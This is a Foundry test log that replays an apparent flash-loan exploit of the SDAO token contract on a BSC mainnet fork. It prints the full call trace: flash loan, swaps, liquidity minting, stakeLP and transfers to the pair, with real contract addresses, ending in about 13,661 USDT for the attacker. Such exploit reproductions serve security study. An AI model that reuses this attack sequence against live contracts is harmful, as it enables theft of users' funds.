Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.22s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/SDAO_exp.sol:36:5:
   |
36 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/SDAO_exp.sol:59:31:
   |
59 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/SDAO_exp.sol:59:47:
   |
59 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/SDAO_exp.sol:59:67:
   |
59 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/SDAO_exp.sol:59:88:
   |
59 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 721.87ms (4.13ms CPU time)

Ran 1 test for src/test/2022-11/SDAO_exp.sol:ContractTest
[PASS] testExploit() (gas: 628562)
Logs:
  [End] Attacker USDT balance after exploit: 13661.918634705551920897

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 23241440 [2.324e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [662462] ContractTest::testExploit()
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24715] 0x6666625Ab26131B490E7015333F97306F05Bf816::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24598] 0x333896437125fF680f146f18c8A164Be831C4C71::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24598] 0x333896437125fF680f146f18c8A164Be831C4C71::approve(0x6666625Ab26131B490E7015333F97306F05Bf816, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xf403915216527d7a528c7e904a79169b63500427e62ef52c480a5df5568c5b18: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24715] 0x6666625Ab26131B490E7015333F97306F05Bf816::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x5344369508570bfcf832aec255f56e111d6042fe658ac2841ba4975941d8ff95: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [507805] 0x26d0c625e5F5D6de034495fbDe1F6e9377185618::flashLoan(0, 500000000000000000000 [5e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20])
    │   │   ├─ emit Transfer(from: 0x26d0c625e5F5D6de034495fbDe1F6e9377185618, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000000 [5e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000
    │   │   │   @ 0xf293ac4f2016c12f970d35cabe52ede86e940214b15208a1107f43cb9557cf4a: 0x0000000000000000000000000000000000000000000034391ad22b11f799758b → 0x00000000000000000000000000000000000000000000341dffed542f0849758b
    │   │   └─ ← [Return] true
    │   ├─ [451497] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 500000000000000000000 [5e20], 0x00)
    │   │   ├─ [117394] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(250000000000000000000 [2.5e20], 0, [0x55d398326f99059fF775485246999027B3197955, 0x6666625Ab26131B490E7015333F97306F05Bf816], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1669017326 [1.669e9])
    │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x333896437125fF680f146f18c8A164Be831C4C71, 250000000000000000000 [2.5e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x333896437125fF680f146f18c8A164Be831C4C71, value: 250000000000000000000 [2.5e20])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039207584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xec1ceac009edeb591bdbbf35678fc6b7cd037d306ecc307c734c43fbb24a2755: 0x00000000000000000000000000000000000000000000033dcb7acfab40eef990 → 0x00000000000000000000000000000000000000000000034b58ed3b1cb896f990
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffff2728d948e8857ffff
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000 → 0x00000000000000000000000000000000000000000000000d8d726b7177a80000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x333896437125fF680f146f18c8A164Be831C4C71::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 15307013096976512121232 [1.53e22], 393488518391113682710684 [3.934e23], 1669017260 [1.669e9]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   └─ ← [Return] 15557013096976512121232 [1.555e22]
    │   │   │   ├─ [92800] 0x333896437125fF680f146f18c8A164Be831C4C71::swap(0, 6307775215048501941827 [6.307e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [58352] 0x6666625Ab26131B490E7015333F97306F05Bf816::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6307775215048501941827 [6.307e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x333896437125fF680f146f18c8A164Be831C4C71, to: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 441544265053395135927 [4.415e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x333896437125fF680f146f18c8A164Be831C4C71, to: 0x0294a4C3E85d57Eb3bE568aaC17C4243d9e78beA, value: 63077752150485019418 [6.307e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x333896437125fF680f146f18c8A164Be831C4C71, to: 0x0000000000000000000000000000000000000000, value: 126155504300970038836 [1.261e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x333896437125fF680f146f18c8A164Be831C4C71, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5676997693543651747644 [5.676e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc7183b2ebf8b980d3676ba2655740c37f0dc4722383889eb1e1363a36be594ca: 0x0000000000000000000000000000000000000000000001310ef02c48885bda4e → 0x0000000000000000000000000000000000000000000001347a515da9f8268568
    │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000007bebc0d8cbd77b1604b03 → 0x00000000000000000000000000000000000000000007beb536ca5ab4d1caf4cf
    │   │   │   │   │   │   @ 22: 0x000000000000000000000000000000000000000000000857689135fbba82fa4b → 0x00000000000000000000000000000000000000000000086f58398fa5c90da802
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000133c02b5c414d40273c
    │   │   │   │   │   │   @ 0x3a82ca2c907593e5e55a17f1532a042e1c40cabc60d60373359337264a29bdf7: 0x0000000000000000000000000000000000000000000330cd725b736d5abefca5 → 0x0000000000000000000000000000000000000000000330e56203cd176949aa5c
    │   │   │   │   │   │   @ 0xced839f25180774fae80205f3a2b4d8c116859faa617c052e4bdf76ded81ee1e: 0x0000000000000000000000000000000000000000000053530e29bd328406f09c → 0x0000000000000000000000000000000000000000000051fd1c327322d8dc1a5b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   │   └─ ← [Return] 15557013096976512121232 [1.555e22]
    │   │   │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   │   └─ ← [Return] 387180743176065180768859 [3.871e23]
    │   │   │   │   ├─ emit Sync(reserve0: 15557013096976512121232 [1.555e22], reserve1: 387180743176065180768859 [3.871e23])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 250000000000000000000 [2.5e20], amount1In: 2, amount0Out: 0, amount1Out: 6307775215048501941827 [6.307e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000002ee4c2b7074f471995730e1536d2367055 → 0x0000000000000000000000000000002ee4c2f2c7b8ba7eedb918c089d852a845
    │   │   │   │   │   @ 8: 0x637b2eac0000000053530e29bd328406f09c00000000033dcb7acfab40eef990 → 0x637b2eb20000000051fd1c327322d8dc1a5b00000000034b58ed3b1cb896f990
    │   │   │   │   │   @ 9: 0x000000000000000000000000000004fd77b436694143d9c2bce120e25fb83fb8 → 0x000000000000000000000000000004fd784e73792daedf8f04501ee105dd3ba2
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 5676997693543651747644 [5.676e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 250000000000000000000 [2.5e20]
    │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 5676997693543651747644 [5.676e21]
    │   │   ├─ [110618] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x55d398326f99059fF775485246999027B3197955, 0x6666625Ab26131B490E7015333F97306F05Bf816, 250000000000000000000 [2.5e20], 2838498846771825873822 [2.838e21], 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1669017326 [1.669e9])
    │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x55d398326f99059fF775485246999027B3197955, 0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 0x333896437125fF680f146f18c8A164Be831C4C71
    │   │   │   ├─ [893] 0x333896437125fF680f146f18c8A164Be831C4C71::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 15557013096976512121232 [1.555e22], 387180743176065180768859 [3.871e23], 1669017266 [1.669e9]
    │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x333896437125fF680f146f18c8A164Be831C4C71, 114051549601219485947 [1.14e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x333896437125fF680f146f18c8A164Be831C4C71, value: 114051549601219485947 [1.14e20])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039093532458311910153988 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xfffffffffffffffffffffffffffffffffffffffffffffff2728d948e8857ffff → 0xffffffffffffffffffffffffffffffffffffffffffffffec43c5147728cfdf04
    │   │   │   │   │   @ 0xec1ceac009edeb591bdbbf35678fc6b7cd037d306ecc307c734c43fbb24a2755: 0x00000000000000000000000000000000000000000000034b58ed3b1cb896f990 → 0x00000000000000000000000000000000000000000000035187b5bb34181f1a8b
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000d8d726b7177a80000 → 0x0000000000000000000000000000000000000000000000075ea9eb5a181fdf05
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [13013] 0x6666625Ab26131B490E7015333F97306F05Bf816::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x333896437125fF680f146f18c8A164Be831C4C71, 2838498846771825873822 [2.838e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 198694919274027811167 [1.986e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0294a4C3E85d57Eb3bE568aaC17C4243d9e78beA, value: 28384988467718258738 [2.838e19])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 56769976935436517476 [5.676e19])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x333896437125fF680f146f18c8A164Be831C4C71, value: 2554648962094643286439 [2.554e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000007beb536ca5ab4d1caf4cf → 0x00000000000000000000000000000000000000000007beb222f2e176b9faf46b
    │   │   │   │   │   @ 0xc7183b2ebf8b980d3676ba2655740c37f0dc4722383889eb1e1363a36be594ca: 0x0000000000000000000000000000000000000000000001347a515da9f8268568 → 0x000000000000000000000000000000000000000000000136043d1a49040e859a
    │   │   │   │   │   @ 0x3a82ca2c907593e5e55a17f1532a042e1c40cabc60d60373359337264a29bdf7: 0x0000000000000000000000000000000000000000000330e56203cd176949aa5c → 0x0000000000000000000000000000000000000000000330f02775f570bca1abbb
    │   │   │   │   │   @ 0xced839f25180774fae80205f3a2b4d8c116859faa617c052e4bdf76ded81ee1e: 0x0000000000000000000000000000000000000000000051fd1c327322d8dc1a5b → 0x0000000000000000000000000000000000000000000052879912c30d086c2c02
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000133c02b5c414d40273c → 0x000000000000000000000000000000000000000000000099e015ae20a6a013a0
    │   │   │   │   │   @ 22: 0x00000000000000000000000000000000000000000000086f58398fa5c90da802 → 0x00000000000000000000000000000000000000000000087a1dabb7ff1c65a961
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [78515] 0x333896437125fF680f146f18c8A164Be831C4C71::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   │   └─ ← [Return] 15671064646577731607179 [1.567e22]
    │   │   │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   │   └─ ← [Return] 389735392138159824055298 [3.897e23]
    │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 36033370510443243377 [3.603e19])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 483960487933166258438 [4.839e20])
    │   │   │   │   ├─ emit Sync(reserve0: 15671064646577731607179 [1.567e22], reserve1: 389735392138159824055298 [3.897e23])
    │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 114051549601219485947 [1.14e20], amount1: 2554648962094643286439 [2.554e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x637b2eb20000000051fd1c327322d8dc1a5b00000000034b58ed3b1cb896f990 → 0x637b2eb20000000052879912c30d086c2c0200000000035187b5bb34181f1a8b
    │   │   │   │   │   @ 11: 0x000000000000000000000000010d44d35fa4b4f063ce378db46f35e8c5afd744 → 0x0000000000000000000000000111df72bf2ad57b4003f6d9c1e5ca9013721916
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000001a3c4d0ba485188906
    │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x000000000000000000000000000000000000000000000002ad4be929aa174cf5 → 0x000000000000000000000000000000000000000000000004a15c28baa118b466
    │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000000f8649a309addf14d922 → 0x000000000000000000000000000000000000000000000fa27a0054e35b2ec999
    │   │   │   │   └─ ← [Return] 483960487933166258438 [4.839e20]
    │   │   │   └─ ← [Return] 114051549601219485947 [1.14e20], 2838498846771825873822 [2.838e21], 483960487933166258438 [4.839e20]
    │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 483960487933166258438 [4.839e20]
    │   │   ├─ [72029] 0x6666625Ab26131B490E7015333F97306F05Bf816::stakeLP(241980243966583129219 [2.419e20])
    │   │   │   ├─ [2537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 1652000000000000000000 [1.652e21]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 1652000000000000000000 [1.652e21]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 1652000000000000000000 [1.652e21]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 1652000000000000000000 [1.652e21]
    │   │   │   ├─ [6376] 0x333896437125fF680f146f18c8A164Be831C4C71::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6666625Ab26131B490E7015333F97306F05Bf816, 241980243966583129219 [2.419e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 241980243966583129219 [2.419e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000001a3c4d0ba485188906 → 0x00000000000000000000000000000000000000000000000d1e2685d2428c4483
    │   │   │   │   │   @ 0x1ce5bde274458f7e91e5e265791663de38704dd6d7d562aa8c07334901af2c76: 0x0000000000000000000000000000000000000000000000598e1aff5431500000 → 0x000000000000000000000000000000000000000000000066ac41852673dc4483
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 24: 0x000000000000000000000000000000000000000000000009509ab425680350d7 → 0x000000000000000000000000000000000000000000000009595d2b6e77d44d3a
    │   │   │   │   @ 23: 0x00000000000000000000000000000000000000000000084196c1f4850bc8fa4b → 0x00000000000000000000000000000000000000000000087a1dabb7ff1c65a961
    │   │   │   │   @ 0x1ce5bde274458f7e91e5e265791663de38704dd6d7d562aa8c07334901af2c76: 0x0000000000000000000000000000000000000000000000598e1aff5431500000 → 0x000000000000000000000000000000000000000000000066ac41852673dc4483
    │   │   │   │   @ 0x755303852e9d37ba89f8d7ed329dac976d9b4e2d10c29c8c06b3e8c55a8b25d6: 0 → 0x000000000000000000000000000000000000000000000009595d2b6e77d44d3a
    │   │   │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 0 → 0x00000000000000000000000000000000000000000000000d1e2685d2428c4483
    │   │   │   └─ ← [Stop]
    │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 2838498846771825873824 [2.838e21]
    │   │   ├─ [13013] 0x6666625Ab26131B490E7015333F97306F05Bf816::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x333896437125fF680f146f18c8A164Be831C4C71, 2838498846771825873824 [2.838e21])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 198694919274027811167 [1.986e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0294a4C3E85d57Eb3bE568aaC17C4243d9e78beA, value: 28384988467718258738 [2.838e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 56769976935436517476 [5.676e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x333896437125fF680f146f18c8A164Be831C4C71, value: 2554648962094643286441 [2.554e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xced839f25180774fae80205f3a2b4d8c116859faa617c052e4bdf76ded81ee1e: 0x0000000000000000000000000000000000000000000052879912c30d086c2c02 → 0x00000000000000000000000000000000000000000000531215f312f737fc3dab
    │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000007beb222f2e176b9faf46b → 0x00000000000000000000000000000000000000000007beaf0f1b6838a22af407
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000099e015ae20a6a013a0 → 2
